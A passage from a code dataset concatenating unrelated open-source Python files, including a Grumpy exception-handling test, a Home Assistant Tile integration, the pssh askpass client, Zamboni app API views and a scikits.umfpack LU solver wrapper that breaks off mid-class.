| shakamunyi/neutron-vrrp | neutron/tests/unit/ml2/test_mechanism_odl.py | Python | apache-2.0 | 9,006 |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=bare-except,broad-except,unreachable,redefined-outer-name
# Each section below sets x to a sentinel, runs one try statement (some with
# deliberately unreachable statements after a raise), and asserts the final
# value of x to pin down Python's try/except/else/finally ordering.
# Else should run when no exception raised.
x = 0
try:
    x = 1
except:
    x = 2
else:
    x = 3
assert x == 3
# Bare except handles all.
x = 0
try:
    x = 1
    raise Exception
    x = 2
except:
    x = 3
assert x == 3
# Correct handler triggered.
x = 0
try:
    x = 1
    raise Exception
    x = 2
except TypeError:
    x = 4
except Exception:
    x = 3
assert x == 3
# Else should not run when exception raised.
x = 0
try:
    x = 1
    raise Exception
    x = 2
except Exception:
    x = 3
else:
    x = 4
assert x == 3
# Finally should execute last.
x = 0
try:
    x = 1
finally:
    x = 2
assert x == 2
# Finally should execute when exception raised.
x = 0
try:
    x = 1
    raise Exception
    x = 2
except:
    x = 3
finally:
    x = 4
assert x == 4
# Uncaught exception should propagate to the next handler.
x = 0
try:
    try:
        raise Exception
        x = 1
    except TypeError:
        x = 2
except Exception:
    x = 3
assert x == 3
# Exceptions that pass through a finally, should propagate.
x = 0
try:
    try:
        x = 1
        raise Exception
        x = 2
    finally:
        x = 3
except Exception:
    pass
assert x == 3
# If a function does not handle an exception it should propagate.
x = 0
def f():
    x = 1
    raise Exception
try:
    f()
    x = 2
except Exception:
    x = 3
assert x == 3
def foo():
    # Re-run the same try/except/else/finally checks as the module level,
    # inside a function body, to verify identical semantics with locals.
    # Else should run when no exception raised.
    x = 0
    try:
        x = 1
    except:
        x = 2
    else:
        x = 3
    assert x == 3
    # Bare except handles all.
    x = 0
    try:
        x = 1
        raise Exception
        x = 2
    except:
        x = 3
    assert x == 3
    # Correct handler triggered.
    x = 0
    try:
        x = 1
        raise Exception
        x = 2
    except TypeError:
        x = 4
    except Exception:
        x = 3
    assert x == 3
    # Else should not run when exception raised.
    x = 0
    try:
        x = 1
        raise Exception
        x = 2
    except Exception:
        x = 3
    else:
        x = 4
    assert x == 3
    # Finally should execute last.
    x = 0
    try:
        x = 1
    finally:
        x = 2
    assert x == 2
    # Finally should execute when exception raised.
    x = 0
    try:
        x = 1
        raise Exception
        x = 2
    except:
        x = 3
    finally:
        x = 4
    assert x == 4
    # Uncaught exception should propagate to the next handler.
    x = 0
    try:
        try:
            raise Exception
            x = 1
        except TypeError:
            x = 2
    except Exception:
        x = 3
    assert x == 3
    # Exceptions that pass through a finally, should propagate.
    x = 0
    try:
        try:
            x = 1
            raise Exception
            x = 2
        finally:
            x = 3
    except Exception:
        pass
    assert x == 3
    # If a function does not handle an exception it should propagate.
    x = 0
    def f():
        x = 1
        raise Exception
    try:
        f()
        x = 2
    except Exception:
        x = 3
    assert x == 3
foo()
| AlexEKoren/grumpy | testing/try_test.py | Python | apache-2.0 | 3,365 |
"""The Tile component."""
import asyncio
from datetime import timedelta
from pytile import async_login
from pytile.errors import SessionExpiredError, TileError
from homeassistant.const import ATTR_ATTRIBUTION, CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import callback
from homeassistant.helpers import aiohttp_client
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from .const import DATA_COORDINATOR, DOMAIN, LOGGER
# Platforms this integration forwards config entries to.
PLATFORMS = ["device_tracker"]
DEVICE_TYPES = ["PHONE", "TILE"]
DEFAULT_ATTRIBUTION = "Data provided by Tile"
DEFAULT_ICON = "mdi:view-grid"
# Cloud polling cadence used by the DataUpdateCoordinator below.
DEFAULT_UPDATE_INTERVAL = timedelta(minutes=2)
CONF_SHOW_INACTIVE = "show_inactive"
async def async_setup(hass, config):
    """Set up the Tile component (creates the shared coordinator storage)."""
    domain_data = {DATA_COORDINATOR: {}}
    hass.data[DOMAIN] = domain_data
    return True
async def async_setup_entry(hass, config_entry):
    """Set up Tile as config entry."""
    websession = aiohttp_client.async_get_clientsession(hass)
    client = await async_login(
        config_entry.data[CONF_USERNAME],
        config_entry.data[CONF_PASSWORD],
        session=websession,
    )
    async def async_update_data():
        """Get new data from the API."""
        try:
            return await client.tiles.all()
        except SessionExpiredError:
            LOGGER.info("Tile session expired; creating a new one")
            await client.async_init()
            # NOTE(review): after re-initializing, this falls through and
            # returns None for this refresh cycle, so the coordinator
            # stores None as data -- confirm whether an immediate retry of
            # client.tiles.all() was intended here.
        except TileError as err:
            raise UpdateFailed(f"Error while retrieving data: {err}") from err
    coordinator = DataUpdateCoordinator(
        hass,
        LOGGER,
        name=config_entry.title,
        update_interval=DEFAULT_UPDATE_INTERVAL,
        update_method=async_update_data,
    )
    # Prime the coordinator once before forwarding setup to platforms.
    await coordinator.async_refresh()
    hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id] = coordinator
    for component in PLATFORMS:
        hass.async_create_task(
            hass.config_entries.async_forward_entry_setup(config_entry, component)
        )
    return True
async def async_unload_entry(hass, config_entry):
    """Unload a Tile config entry and drop its coordinator on success."""
    unload_tasks = [
        hass.config_entries.async_forward_entry_unload(config_entry, platform)
        for platform in PLATFORMS
    ]
    results = await asyncio.gather(*unload_tasks)
    unload_ok = all(results)
    if unload_ok:
        hass.data[DOMAIN][DATA_COORDINATOR].pop(config_entry.entry_id)
    return unload_ok
class TileEntity(CoordinatorEntity):
    """Define a generic Tile entity."""
    def __init__(self, coordinator):
        """Initialize."""
        super().__init__(coordinator)
        self._attrs = {ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION}
        # Populated by subclasses in _update_from_latest_data().
        self._name = None
        self._unique_id = None
    @property
    def device_state_attributes(self):
        """Return the device state attributes."""
        return self._attrs
    @property
    def icon(self):
        """Return the icon."""
        return DEFAULT_ICON
    @property
    def name(self):
        """Return the name."""
        return self._name
    @property
    def unique_id(self):
        """Return the unique ID of the entity."""
        return self._unique_id
    @callback
    def _handle_coordinator_update(self):
        """Respond to a DataUpdateCoordinator update."""
        self._update_from_latest_data()
        self.async_write_ha_state()
    @callback
    def _update_from_latest_data(self):
        """Update the entity from the latest data."""
        # Subclasses must implement this; it runs on every coordinator
        # refresh and once when the entity is added to Home Assistant.
        raise NotImplementedError
    async def async_added_to_hass(self):
        """Handle entity which will be added."""
        await super().async_added_to_hass()
        self._update_from_latest_data()
| tboyce1/home-assistant | homeassistant/components/tile/__init__.py | Python | apache-2.0 | 3,733 |
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2016, 2017
class DataAlreadyExistsError(RuntimeError):
    """Raised when data with a duplicate label is added to a document."""
    def __init__(self, label):
        message = str("Data with label '%s' already exists and cannot be added" % (label))
        # Pass the message to RuntimeError so str(exc) and tracebacks show
        # it; the original only set the attribute, leaving str(exc) empty.
        super(DataAlreadyExistsError, self).__init__(message)
        self.message = message
def get_patient_id(d):
    """Return the patient identifier stored in document *d*."""
    patient = d['patient']
    return patient['identifier']
def get_index_by_label(d, label):
    """Return the index of the first d['data'] entry whose 'label' matches,
    or None when no entry carries that label."""
    for position, entry in enumerate(d['data']):
        if entry['label'] == label:
            return position
    return None
def get_sampled_data_values(d, label):
    """Return the sample values for the data entry labelled *label*."""
    return d['data'][get_index_by_label(d, label)]['valueSampledData']['values']
def get_coordinate_data_values(d, label):
    """Return the coordinate values for the data entry labelled *label*."""
    entry = d['data'][get_index_by_label(d, label)]
    return entry['valueCoordinateData']['values']
def get_period_value(d, label):
    """Return the sampling period value for the entry labelled *label*."""
    return d['data'][get_index_by_label(d, label)]['valueSampledData']['period']['value']
def get_sampled_data_unit(d, label):
    """Return the measurement unit for the entry labelled *label*."""
    entry = d['data'][get_index_by_label(d, label)]
    return entry['valueSampledData']['unit']
def get_period_unit(d, label):
    """Return the sampling period unit for the entry labelled *label*."""
    return d['data'][get_index_by_label(d, label)]['valueSampledData']['period']['unit']
def get_gain(d, label):
    """Return the gain of the sampled-data entry labelled *label*."""
    entry = d['data'][get_index_by_label(d, label)]
    return entry['valueSampledData']['gain']
def get_initValue(d, label):
    """Return the initial value of the sampled-data entry labelled *label*."""
    entry = d['data'][get_index_by_label(d, label)]
    return entry['valueSampledData']['initVal']
def get_patient_ID(d):
    """Return the patient identifier (alias of get_patient_id)."""
    patient_record = d['patient']
    return patient_record['identifier']
def add_sampled_data(d, label, sampled_data, period_value, period_unit, update_if_exists=False):
    """Add (or, when update_if_exists, replace) a sampled-data entry.

    Raises DataAlreadyExistsError when *label* already exists and
    update_if_exists is False.
    """
    # Key fixes vs. the original: write under 'valueSampledData' (every
    # reader, e.g. get_sampled_data_values, uses that key -- the original
    # wrote 'valuesSampledData'), and always include 'label' so a replaced
    # entry stays findable by get_index_by_label().
    v = {'label': label,
         'valueSampledData': {'values': sampled_data,
                              'period': {'value': period_value,
                                         'unit': period_unit}}}
    # check if label already exists
    data_idx = get_index_by_label(d, label)
    if data_idx is not None:
        if update_if_exists == True:
            d['data'][data_idx] = v
        else:
            raise DataAlreadyExistsError(label=label)
    else:
        d['data'].append(v)
def add_coordinate_data(d, label, coords, replace_if_exists=False):
    """Add (or, when replace_if_exists, replace) a coordinate-data entry.

    Raises DataAlreadyExistsError when *label* already exists and
    replace_if_exists is False.
    """
    # Always include 'label': the original dropped it when replacing an
    # existing entry, making that entry unfindable by get_index_by_label().
    v = {'label': label, 'valueCoordinateData': {'values': coords}}
    data_idx = get_index_by_label(d, label)
    if data_idx is not None:
        if replace_if_exists == True:
            d['data'][data_idx] = v
        else:
            raise DataAlreadyExistsError(label=label)
    else:
        d['data'].append(v)
| IBMStreams/streamsx.health | samples/HealthcareJupyterDemo/package/healthdemo/utils.py | Python | apache-2.0 | 2,562 |
from __future__ import print_function, unicode_literals
# Core server behaviour for the "provider1" federation test deployment.
core_store_students_programs = False
core_store_students_programs_path = 'files_stored'
core_experiment_poll_time = 350 # seconds

# Ports
core_facade_port = 28345
core_facade_server_route = 'provider1-route'

# Will only work in JSON in this config file :-(
core_server_url = 'http://127.0.0.1:%s/weblab/' % core_facade_port

# Scheduling
core_coordinator_db_name = 'WebLabCoordination2'
core_coordinator_db_username = 'weblab'
core_coordinator_db_password = 'weblab'

# Maps laboratory server addresses to the experiments they host
# ("experiment|category" -> "experiment@scheduling_system").
core_coordinator_laboratory_servers = {
    "laboratory:main_instance@provider1_machine" : {
        "exp1|dummy1|Dummy experiments" : "dummy1@dummy1_local",
        "exp1|dummy3_with_other_name|Dummy experiments" : "dummy3_with_other_name@dummy3_with_other_name",
    }
}

# Experiments that are also (or only) reachable through an external
# federated WebLab-Deusto instance.
core_coordinator_external_servers = {
    'dummy1@Dummy experiments' : [ 'dummy1_external' ],
    'dummy4@Dummy experiments' : [ 'dummy4' ],
}

# Shared credentials/endpoint for the federated "provider2" instance.
_provider2_scheduling_config = ("EXTERNAL_WEBLAB_DEUSTO", {
                                    'baseurl' : 'http://127.0.0.1:38345/weblab/',
                                    'username' : 'provider1',
                                    'password' : 'password',
                                })

# Scheduling backend per experiment: local priority queues plus the
# external WebLab-Deusto federation defined above.
core_scheduling_systems = {
    "dummy1_local"            : ("PRIORITY_QUEUE", {}),
    "dummy3_with_other_name"  : ("PRIORITY_QUEUE", {}),
    "dummy4"                  : _provider2_scheduling_config,
    "dummy1_external"         : _provider2_scheduling_config,
}

# How often (seconds) federated results are retrieved.
core_weblabdeusto_federation_retrieval_period = 0.1
| morelab/weblabdeusto | server/src/test/deployments/federated_basic_sql/provider1/core_config.py | Python | bsd-2-clause | 1,626 |
#!/usr/bin/env python
# -*- Mode: python -*-
# Copyright (c) 2009, Andrew McNabb
"""Implementation of SSH_ASKPASS to get a password to ssh from pssh.
The password is read from the socket specified by the environment variable
PSSH_ASKPASS_SOCKET. The other end of this socket is pssh.
The ssh man page discusses SSH_ASKPASS as follows:
If ssh needs a passphrase, it will read the passphrase from the current
terminal if it was run from a terminal. If ssh does not have a terminal
associated with it but DISPLAY and SSH_ASKPASS are set, it will execute
the program specified by SSH_ASKPASS and open an X11 window to read the
passphrase. This is particularly useful when calling ssh from a .xsession
or related script. (Note that on some machines it may be necessary to
redirect the input from /dev/null to make this work.)
"""
import os
import socket
import sys
import textwrap
# Directory containing this script, so a source checkout finds its own
# bundled pssh-askpass helper first.
bin_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
askpass_bin_path = os.path.join(bin_dir, 'pssh-askpass')

# Candidate install locations for the askpass helper, searched in order.
ASKPASS_PATHS = (askpass_bin_path,
        '/usr/libexec/pssh/pssh-askpass',
        '/usr/local/libexec/pssh/pssh-askpass',
        '/usr/lib/pssh/pssh-askpass',
        '/usr/local/lib/pssh/pssh-askpass')

# Cached result of executable_path(); None means "not determined yet".
_executable_path = None
def executable_path():
    """Determines the value to use for SSH_ASKPASS.

    The value is cached since this may be called many times.  An empty
    string is cached (and a warning printed once) when no helper binary
    can be found.
    """
    global _executable_path
    if _executable_path is not None:
        return _executable_path
    found = next((p for p in ASKPASS_PATHS if os.access(p, os.X_OK)), None)
    if found is not None:
        _executable_path = found
    else:
        _executable_path = ''
        sys.stderr.write(textwrap.fill("Warning: could not find an"
            " executable path for askpass because PSSH was not"
            " installed correctly. Password prompts will not work."))
        sys.stderr.write('\n')
    return _executable_path
def askpass_main():
    """Connects to pssh over the socket specified at PSSH_ASKPASS_SOCKET.

    Reads the password from the socket and prints it to stdout for ssh.
    Exit codes: 1 for usage/prompt problems, 2 for connect failures,
    3 for socket read failures.
    """
    verbose = os.getenv('PSSH_ASKPASS_VERBOSE')
    # It's not documented anywhere, as far as I can tell, but ssh may prompt
    # for a password or ask a yes/no question. The command-line argument
    # specifies what is needed.
    if len(sys.argv) > 1:
        prompt = sys.argv[1]
        if verbose:
            sys.stderr.write('pssh-askpass received prompt: "%s"\n' % prompt)
        if not prompt.strip().lower().endswith('password:'):
            # Not a password request (e.g. a host-key yes/no question):
            # surface the prompt and fail rather than answer it blindly.
            sys.stderr.write(prompt)
            sys.stderr.write('\n')
            sys.exit(1)
    else:
        sys.stderr.write('Error: pssh-askpass called without a prompt.\n')
        sys.exit(1)
    address = os.getenv('PSSH_ASKPASS_SOCKET')
    if not address:
        sys.stderr.write(textwrap.fill("pssh error: SSH requested a password."
                " Please create SSH keys or use the -A option to provide a"
                " password."))
        sys.stderr.write('\n')
        sys.exit(1)
    sock = socket.socket(socket.AF_UNIX)
    try:
        sock.connect(address)
    except socket.error:
        _, e, _ = sys.exc_info()
        # BUGFIX: socket.error may carry (errno, message) or a single
        # argument; indexing args[1] unconditionally could raise IndexError.
        message = e.args[1] if len(e.args) > 1 else str(e)
        # BUGFIX: this is a connect(), not a bind() - report it accurately.
        sys.stderr.write("Couldn't connect to %s: %s.\n" % (address, message))
        sys.exit(2)
    try:
        password = sock.makefile().read()
    except socket.error:
        sys.stderr.write("Socket error.\n")
        sys.exit(3)
    print(password)
| jorik041/parallel-ssh | psshlib/askpass_client.py | Python | bsd-3-clause | 3,462 |
from __future__ import division
import numpy as np
from numpy.testing import assert_almost_equal
import pytest
from acoustics.power import lw_iso3746
@pytest.mark.parametrize("background_noise, expected", [
    (79, 91.153934187),
    (83, 90.187405234),
    (88, 88.153934187),
])
def test_lw_iso3746(background_noise, expected):
    """Sound power level per ISO 3746 matches pre-computed reference values."""
    pressure_levels = np.array([90, 90, 90, 90])
    background_levels = np.full(4, background_noise, dtype=float)
    measurement_surface = 10
    absorption_coeffs = np.array([0.1, 0.1, 0.1, 0.1, 0.1, 0.1])
    room_surfaces = np.array([10, 10, 10, 10, 10, 10])
    result = lw_iso3746(pressure_levels, background_levels,
                        measurement_surface, absorption_coeffs, room_surfaces)
    assert_almost_equal(result, expected)
| FRidh/python-acoustics | tests/test_power.py | Python | bsd-3-clause | 637 |
from django import forms as django_forms
from django.core.urlresolvers import reverse
from django.http import Http404
import commonware
import waffle
from rest_framework import exceptions, response, serializers, status, viewsets
from rest_framework.decorators import detail_route
from rest_framework.response import Response
from lib.metrics import record_action
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.api.exceptions import HttpLegallyUnavailable
from mkt.api.forms import IconJSONForm
from mkt.api.permissions import (AllowAppOwner, AllowReadOnlyIfPublic,
AllowReviewerReadOnly, AnyOf)
from mkt.developers import tasks
from mkt.developers.forms import (AppFormMedia, IARCGetAppInfoForm,
IARCV2ExistingCertificateForm)
from mkt.files.models import FileUpload
from mkt.regions import get_region
from mkt.submit.views import PreviewViewSet
from mkt.webapps.models import AddonUser, get_excluded_in, Webapp
from mkt.webapps.serializers import AppSerializer
log = commonware.log.getLogger('z.api')
class AppViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
                 viewsets.ModelViewSet):
    """CRUD API endpoint for webapps.

    Apps excluded in the current region are hidden from anonymous/public
    requests but remain visible to their owners and to reviewers.
    """
    serializer_class = AppSerializer
    slug_field = 'app_slug'
    cors_allowed_methods = ('get', 'put', 'post', 'delete')
    permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
                                AllowReadOnlyIfPublic)]
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]

    def get_queryset(self):
        """Apps visible in the requesting user's region."""
        return Webapp.objects.all().exclude(
            id__in=get_excluded_in(get_region().id))

    def get_base_queryset(self):
        """All apps, ignoring regional exclusions."""
        return Webapp.objects.all()

    def get_object(self):
        """Look up the app; fall back to the region-unfiltered queryset.

        If the app exists but is excluded in this region, owners and
        reviewers still get it; everyone else gets a 451-style
        "legally unavailable" response with minimal app info.
        """
        try:
            app = super(AppViewSet, self).get_object()
        except Http404:
            # Retry without the regional exclusion filter.
            self.get_queryset = self.get_base_queryset
            app = super(AppViewSet, self).get_object()
            # Owners and reviewers can see apps regardless of region.
            owner_or_reviewer = AnyOf(AllowAppOwner, AllowReviewerReadOnly)
            if owner_or_reviewer.has_object_permission(self.request, self,
                                                       app):
                return app
            data = {}
            for key in ('name', 'support_email', 'support_url'):
                value = getattr(app, key)
                data[key] = unicode(value) if value else ''
            data['reason'] = 'Not available in your region.'
            raise HttpLegallyUnavailable(data)
        self.check_object_permissions(self.request, app)
        return app

    def create(self, request, *args, **kwargs):
        """Create an app from a validated FileUpload (packaged or hosted)."""
        # 'upload' means a packaged app; 'manifest' means a hosted app.
        uuid = request.data.get('upload', '')
        if uuid:
            is_packaged = True
        else:
            uuid = request.data.get('manifest', '')
            is_packaged = False
        if not uuid:
            raise exceptions.ParseError(
                'No upload or manifest specified.')
        try:
            upload = FileUpload.objects.get(uuid=uuid)
        except FileUpload.DoesNotExist:
            raise exceptions.ParseError('No upload found.')
        if not upload.valid:
            raise exceptions.ParseError('Upload not valid.')
        if not request.user.read_dev_agreement:
            log.info(u'Attempt to use API without dev agreement: %s'
                     % request.user.pk)
            raise exceptions.PermissionDenied('Terms of Service not accepted.')
        if not (upload.user and upload.user.pk == request.user.pk):
            raise exceptions.PermissionDenied('You do not own that app.')

        # Create app, user and fetch the icon.
        try:
            obj = Webapp.from_upload(upload, is_packaged=is_packaged)
        except (serializers.ValidationError,
                django_forms.ValidationError) as e:
            raise exceptions.ParseError(unicode(e))
        AddonUser(addon=obj, user=request.user).save()
        tasks.fetch_icon.delay(obj.pk, obj.latest_version.all_files[0].pk)
        record_action('app-submitted', request, {'app-id': obj.pk})
        log.info('App created: %s' % obj.pk)
        data = AppSerializer(
            context=self.get_serializer_context(), instance=obj).data
        return response.Response(
            data, status=201,
            headers={'Location': reverse('app-detail', kwargs={'pk': obj.pk})})

    def update(self, request, *args, **kwargs):
        """Full update; responds 202 instead of 200 for tastypie parity."""
        # Fail if the app doesn't exist yet.
        self.get_object()
        r = super(AppViewSet, self).update(request, *args, **kwargs)
        # Be compatible with tastypie responses.
        if r.status_code == 200:
            r.status_code = 202
        return r

    def list(self, request, *args, **kwargs):
        """List only the authenticated user's own apps."""
        if not request.user.is_authenticated():
            log.info('Anonymous listing not allowed')
            raise exceptions.PermissionDenied('Anonymous listing not allowed.')

        self.object_list = self.filter_queryset(self.get_queryset().filter(
            authors=request.user))
        page = self.paginate_queryset(self.object_list)
        serializer = self.get_serializer(page, many=True)
        return self.get_paginated_response(serializer.data)

    def partial_update(self, request, *args, **kwargs):
        """PATCH is not supported on this endpoint."""
        raise exceptions.MethodNotAllowed('PATCH')

    @detail_route(methods=['POST'])
    def content_ratings(self, request, *args, **kwargs):
        """Request IARC content ratings for the app."""
        app = self.get_object()
        if waffle.switch_is_active('iarc-upgrade-v2'):
            form = IARCV2ExistingCertificateForm(data=request.data, app=app)
        else:
            form = IARCGetAppInfoForm(data=request.data, app=app)
        if form.is_valid():
            try:
                form.save(app)
                return Response(status=status.HTTP_201_CREATED)
            except django_forms.ValidationError:
                # Fall through to the 400 response below.
                pass
        return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)

    @detail_route(
        methods=['POST'],
        cors_allowed_methods=PreviewViewSet.cors_allowed_methods)
    def preview(self, request, *args, **kwargs):
        """Delegate preview creation to PreviewViewSet."""
        kwargs['app'] = self.get_object()
        view = PreviewViewSet.as_view({'post': '_create'})
        return view(request, *args, **kwargs)

    @detail_route(methods=['PUT'], cors_allowed_methods=['put'])
    def icon(self, request, *args, **kwargs):
        """Replace the app icon from JSON-encoded image data."""
        app = self.get_object()

        data_form = IconJSONForm(request.data)
        if not data_form.is_valid():
            return Response(data_form.errors,
                            status=status.HTTP_400_BAD_REQUEST)

        form = AppFormMedia(data_form.cleaned_data, request=request)
        if not form.is_valid():
            # BUGFIX: report the media form's errors; the original
            # returned data_form.errors, which is empty at this point.
            return Response(form.errors,
                            status=status.HTTP_400_BAD_REQUEST)

        form.save(app)
        return Response(status=status.HTTP_200_OK)
class PrivacyPolicyViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
                           viewsets.GenericViewSet):
    """Read-only endpoint exposing a single app's privacy policy text."""
    queryset = Webapp.objects.all()
    cors_allowed_methods = ('get',)
    permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
                                AllowReadOnlyIfPublic)]
    slug_field = 'app_slug'
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]

    def retrieve(self, request, *args, **kwargs):
        """Return {'privacy_policy': <text>} for the requested app."""
        app = self.get_object()
        return response.Response(
            {'privacy_policy': unicode(app.privacy_policy)},
            content_type='application/json')
| ingenioustechie/zamboni | mkt/webapps/views.py | Python | bsd-3-clause | 7,946 |
"""
Easy-to-use UMFPACK interface
=============================
.. currentmodule:: scikits.umfpack
The following functions can be used for LU decompositions and solving
equation systems:
.. autosummary::
:toctree: reference/
spsolve
splu
UmfpackLU
"""
from __future__ import division, print_function, absolute_import
from warnings import warn
import sys
import numpy as np
from numpy import asarray
from scipy.sparse import (isspmatrix_csc, isspmatrix_csr, isspmatrix,
SparseEfficiencyWarning, csc_matrix, hstack)
from .umfpack import UmfpackContext, UMFPACK_A
_families = {
(np.float64, np.int32): 'di',
(np.complex128, np.int32): 'zi',
(np.float64, np.int64): 'dl',
(np.complex128, np.int64): 'zl'
}
__all__ = ['spsolve', 'splu', 'UmfpackLU']
if sys.version_info[0] >= 3:
xrange = range
def spsolve(A, b):
    """Solve the sparse linear system Ax=b, where b may be a vector or a matrix.

    Parameters
    ----------
    A : ndarray or sparse matrix
        The square matrix A will be converted into CSC or CSR form
    b : ndarray or sparse matrix
        The matrix or vector representing the right hand side of the equation.

    Returns
    -------
    x : ndarray or sparse matrix
        the solution of the sparse linear equation.
        If b is a vector, then x is a vector of size A.shape[0]
        If b is a matrix, then x is a matrix of size (A.shape[0],)+b.shape[1:]
    """
    solution = UmfpackLU(A).solve(b)
    if b.ndim == 2 and b.shape[1] == 1:
        # scipy.sparse.spsolve flattens single-column right-hand sides;
        # mirror that quirk for drop-in compatibility.
        return solution.ravel()
    return solution
def splu(A):
    """
    Compute the LU decomposition of a sparse, square matrix.

    Parameters
    ----------
    A : sparse matrix
        Sparse matrix to factorize. Should be in CSR or CSC format.

    Returns
    -------
    invA : scikits.umfpack.UmfpackLU
        Object, which has a ``solve`` method.

    Notes
    -----
    This function uses the UMFPACK library.
    """
    # The factorization itself happens eagerly in UmfpackLU.__init__.
    return UmfpackLU(A)
class UmfpackLU(object):
    """
    LU factorization of a sparse matrix.

    Factorization is represented as::

        Pr * (R^-1) * A * Pc = L * U

    Parameters
    ----------
    A : csc_matrix or csr_matrix
        Matrix to decompose

    Attributes
    ----------
    shape
    nnz
    perm_c
    perm_r
    L
    U
    R

    Methods
    -------
    solve
    solve_sparse

    Examples
    --------
    The LU decomposition can be used to solve matrix equations. Consider:

    >>> import numpy as np
    >>> from scipy.sparse import csc_matrix
    >>> from scikits import umfpack
    >>> A = csc_matrix([[1,2,0,4],[1,0,0,1],[1,0,2,1],[2,2,1,0.]])

    This can be solved for a given right-hand side:

    >>> lu = umfpack.splu(A)
    >>> b = np.array([1, 2, 3, 4])
    >>> x = lu.solve(b)
    >>> A.dot(x)
    array([ 1., 2., 3., 4.])

    The ``lu`` object also contains an explicit representation of the
    decomposition. The permutations are represented as mappings of
    indices:

    >>> lu.perm_r
    array([0, 2, 1, 3], dtype=int32)
    >>> lu.perm_c
    array([2, 0, 1, 3], dtype=int32)

    The L and U factors are sparse matrices in CSC format:

    >>> lu.L.A
    array([[ 1. , 0. , 0. , 0. ],
           [ 0. , 1. , 0. , 0. ],
           [ 0. , 0. , 1. , 0. ],
           [ 1. , 0.5, 0.5, 1. ]])
    >>> lu.U.A
    array([[ 2., 0., 1., 4.],
           [ 0., 2., 1., 1.],
           [ 0., 0., 1., 1.],
           [ 0., 0., 0., -5.]])

    The permutation matrices can be constructed:

    >>> Pr = csc_matrix((4, 4))
    >>> Pr[lu.perm_r, np.arange(4)] = 1
    >>> Pc = csc_matrix((4, 4))
    >>> Pc[np.arange(4), lu.perm_c] = 1

    Similarly for the row scalings:

    >>> R = csc_matrix((4, 4))
    >>> R.setdiag(lu.R)

    We can reassemble the original matrix:

    >>> (Pr.T * R * (lu.L * lu.U) * Pc.T).A
    array([[ 1., 2., 0., 4.],
           [ 1., 0., 0., 1.],
           [ 1., 0., 2., 1.],
           [ 2., 2., 1., 0.]])
    """
    def __init__(self, A):
        # Accept any matrix type, but warn when an implicit CSC conversion
        # is needed (it copies the data).
        if not (isspmatrix_csc(A) or isspmatrix_csr(A)):
            A = csc_matrix(A)
            warn('spsolve requires A be CSC or CSR matrix format',
                    SparseEfficiencyWarning)

        A.sort_indices()
        A = A.asfptype()  # upcast to a floating point format

        M, N = A.shape
        if (M != N):
            raise ValueError("matrix must be square (has shape %s)" % ((M, N),))

        # Map (value dtype, index dtype) to the UMFPACK "family" code,
        # e.g. (float64, int32) -> 'di'.
        f_type = np.sctypeDict[A.dtype.name]
        i_type = np.sctypeDict[A.indices.dtype.name]
        try:
            family = _families[(f_type, i_type)]
        except KeyError:
            msg = 'only float64 or complex128 matrices with int32 or int64' \
                ' indices are supported! (got: matrix: %s, indices: %s)' \
                % (f_type, i_type)
            raise ValueError(msg)

        # Numeric factorization is performed eagerly here; solve() reuses it.
        self.umf = UmfpackContext(family)
        self.umf.numeric(A)

        self._A = A
        # Explicit L/U/P/Q/R factors are extracted lazily by _compute_lu().
        self._L = None
        self._U = None
        self._P = None
        self._Q = None
        self._R = None

    def solve(self, b):
        """
        Solve linear equation A x = b for x

        Parameters
        ----------
        b : ndarray
            Right-hand side of the matrix equation. Can be vector or a matrix.

        Returns
        -------
        x : ndarray
            Solution to the matrix equation
        """
        if isspmatrix(b):
            b = b.toarray()

        if b.shape[0] != self._A.shape[1]:
            raise ValueError("Shape of b is not compatible with that of A")

        b_arr = asarray(b, dtype=self._A.dtype).reshape(b.shape[0], -1)
        x = np.zeros((self._A.shape[0], b_arr.shape[1]), dtype=self._A.dtype)

        # UMFPACK solves one right-hand side at a time; iterate columns.
        for j in range(b_arr.shape[1]):
            x[:,j] = self.umf.solve(UMFPACK_A, self._A, b_arr[:,j], autoTranspose=True)

        return x.reshape((self._A.shape[0],) + b.shape[1:])

    def solve_sparse(self, B):
        """
        Solve linear equation of the form A X = B. Where B and X are sparse matrices.

        Parameters
        ----------
        B : any scipy.sparse matrix
            Right-hand side of the matrix equation.
            Note: it will be converted to csc_matrix via `.tocsc()`.

        Returns
        -------
        X : csc_matrix
            Solution to the matrix equation as a csc_matrix
        """
        B = B.tocsc()
        cols = list()
        # Solve column by column and re-assemble the sparse result.
        for j in xrange(B.shape[1]):
            col = self.solve(B[:,j])
            cols.append(csc_matrix(col))
        return hstack(cols)

    def _compute_lu(self):
        # Lazily extract the explicit factors; cached after the first call.
        if self._L is None:
            self._L, self._U, self._P, self._Q, self._R, do_recip = self.umf.lu(self._A)
            if do_recip:
                with np.errstate(divide='ignore'):
                    np.reciprocal(self._R, out=self._R)
            # Conform to scipy.sparse.splu convention on permutation matrices
            self._P = self._P[self._P]

    @property
    def shape(self):
        """
        Shape of the original matrix as a tuple of ints.
        """
        return self._A.shape

    @property
    def L(self):
        """
        Lower triangular factor with unit diagonal as a
        `scipy.sparse.csc_matrix`.
        """
        self._compute_lu()
        return self._L

    @property
    def U(self):
        """
        Upper triangular factor as a `scipy.sparse.csc_matrix`.
        """
